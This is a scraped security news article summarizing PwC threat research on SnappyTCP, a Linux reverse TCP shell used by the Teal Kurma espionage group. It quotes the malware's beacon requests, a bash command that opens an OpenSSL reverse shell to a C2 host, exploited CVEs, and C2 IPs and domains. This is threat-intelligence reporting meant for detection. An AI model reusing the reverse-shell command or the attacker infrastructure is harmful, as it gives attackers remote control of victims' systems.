# SnappyTCP - Reverse Shell for Linux/Unix Systems With C2 Capabilities
## Hackers exploit reverse TCP shells on Linux or Unix systems to gain unauthorized remote access. This enables them to do the following illicit activities by exploiting vulnerabilities while masking their identity and location:-
## Information:

+ Link: https://cybersecuritynews.com/?p=52563
+ Source: Cyber Security News
+ Author: Tushar Subhra Dutta
+ Date published: 07 December 2023, 14:17
+ Date scraped: 07 December 2023, 15:03

## Article:
![Main article image](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8HSZhhrB8QT4iVxKfaprI2Dd_GWWPb4RTsOxBrC4g4RNfM4PVVTmYopz_DKhKBGB7A2zqwX02HBZ2y6_3u6bodZjbIGv-yU58v0eEw_XXgCAa-BRHR5_xHntgFlArD5-WdcrBTufdkR-GciFmuK8YEXkmdhPsdMtmPXMjbZewQsLhrCWsaLsjPJE5Ce5/s16000/SnappyTCP%20-%20Reverse%20TCP%20Shell%20for%20Linux%20or%20Unix%20Systems%20With%20C2%20Capabilities.webp)


Hackers exploit reverse TCP shells on Linux or Unix systems to gain unauthorized remote access. This enables them to do the following illicit activities by exploiting vulnerabilities while masking their identity and location:-


* Execute commands
* Exfiltrate data
* Compromise the system’s security


Cybersecurity researchers at PwC [recently discovered](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html) a reverse TCP shell for Linux or Unix systems with C2 capabilities while analyzing one of the malware of Teal Kurma (a.k.a. Sea Turtle, Marbled Dust, Cosmic Wolf) dubbed ‘SnappyTCP’.


Besides this, the three years Teal Kurma was initially tracked three years ago, and it primarily focuses on the targets throughout:-


* Europe
* Middle East


**SnappyTCP: Reverse TCP Shell**
--------------------------------


Since 2017, Teal Kurma has been exploiting vulnerabilities, especially CVEs like-


* [CVE-2021-44228](https://cybersecuritynews.com/20-most-exploited-vulnerabilities-microsofts-products/)
* CVE-2021-21974
* CVE-2022-0847


After gaining access, they run “upxa.sh,” and then communicate with a server under their control with the help of an executable they dropped by them.



![](https://lh7-us.googleusercontent.com/Wtt2X6x-E9IxEGPGe4HKw4KSfbfXhV97aEtJQfNbn0Qgwhx720vb9g_nvWcKWQmuOkXWBUpLSPD_SkzExjo18YSRU7CCiWfiYe5Qd5qJoQUuedQ9KAP2KDKgpx9MUdc2b0nYEbSB_iSCDdoiefXrF58)upxa.sh (Source – PWC)


With basic [C2 capabilities](https://cybersecuritynews.com/command-and-controlc2-server/) and persistence functions, the Webshell is a Linux/Unix reverse TCP shell. Besides this, two variants exist, and they do the following things:-


* One variant secures connections with OpenSSL over TLS.
* Another variant sends cleartext requests.



![](https://lh7-us.googleusercontent.com/Hf9YqD9LzSFTZLshZF19x9JtOE39_1a7b_1Vy2zgiZwKhar3EXOiKPX1L-u2nBp8lImRsxw_E_rny_3fv-QnRiSRQhbwcLloXcZ0685jyYxUc7ykxfaFykCeo1Kpc5AYJnHC2QUxsPFoiS3xqLNO5os)


The non-TLS malware reads “conf” file, extracts IP from the first 256 bytes, and connects via TCP socket with the command:-


* ***GET /sy.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\n\r\n”, host\_name, host\_name***


sy.php hosted at hxxp://lo0[.]systemctl[.]network/sy.php since July 2021, linked to 2022 Greek CERT alert, suggesting sustained use. Recent infrastructure in 2023 linked to SnappyTCP via CERT alert indicators.


Malware scans for “X-Auth-43245-S-20” and “\r\n\r\n” in HTTP request, then triggers TCP reverse shell. Using [OpenSSL](https://cybersecuritynews.com/openssl-fixed-two-high-severity-vulnerabilities/) and TLS certificates for a secure link, the malware, in other cases, connects to an IP from the conf file, and then it sends:-


* ***GET /ssl.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\nConnection: close\\r\\n\\r\\n***


Similar to past instances, it spawns a pthread calling bash to execute a different file, ‘update,’ not ‘kdd\_launch’:-


* ***bash -c \\”./update exec:’bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\\”***


SnappyTCP binaries use various toolchains (Table 1). GLIBC is statically linked, enabling self-contained operation without linking to the target machine’s library files.


However, besides this, the execution methods vary, resulting in either a shared object file or an executable.


The ELF files lack compile dates, as it helps in hiding the linking variations in toolchain usage to malware evolution. Multiple developers or cross-compilation for diverse architectures might explain the toolchain diversity.


The GitHub repository reveals Teal Kurma’s reverse TCP shell mirroring public code, with ‘update’ replacing ‘connector.’ Other samples in the repository establish reverse shells, possibly tied to Teal Kurma’s activity.


The analyzed samples pivoted on SnappyTCP GET requests and used Sea Turtle reporting (e.g., 2022 Greek CERT alert) for the Teal Kurma infrastructure hunt. Identified suspicious domains like hxxp://108.61.103[.]186/sy.php and ybcd[.]tech. Explored CERT infrastructure and found active links:-


* 168.100.10[.]187
* 93.115.22[.]212


![](https://lh7-us.googleusercontent.com/nE7LYVNQKRRBOROhjtr9cMtqgR_E9hwounHctyo4tvwyXCdnFWnvqdA6wuhgwc4A04I-k4krTBZ3XPixkmmlE_P15zUp3jRucLPOaUbH2yy3Vnvqnn-Vl47kw4KCKyNCJGEFrcYBFn-y_xw0J_InXN8)Infrastructure (Source – PWC)


Uncovered TLS certificates tied to Media and NGO sectors, targeting the Middle East, using the reverse shell for espionage. Victimology suggests a focus on the following entities for sensitive data:-


* Governments
* Telecom
* IT providers


Telecom holds customer metadata, and tech companies are vulnerable to island-hopping attacks. Threat actors aim for surveillance or traditional intelligence, with NGO and media sectors also targeted.


TLS certificates indicate the Middle East and North Africa focus; SnappyTCP is likely in European countries. Targeting details aids attribution and provides insights for organizations in similar regions or sectors.


**Recommendations**
-------------------


Here below, we have mentioned all the recommendations provided by the security researchers:-


* Make sure to check the logs
* Set up alerts for blog indicators
* If found, then make sure to investigate the origins
* If found, then conduct forensic analysis
* Block malicious indicators if there are no significant findings.





## Tags:
***CVE's***: CVE-2022-0847 CVE-2021-44228 CVE-2021-21974
***ipv4-adresses***: 168.100.10.187 108.61.103.186 93.115.22.212
***urls***: http://lo0.systemctl.network/sy.php http://ybcd.tech http://93.115.22.212 http://168.100.10.187 http://108.61.103.186/sy.php

### Autogenerated tags:
[[tcp]] [[kurma]] [[malware]] [[snappytcp]] [[tls]] [[pwc]]
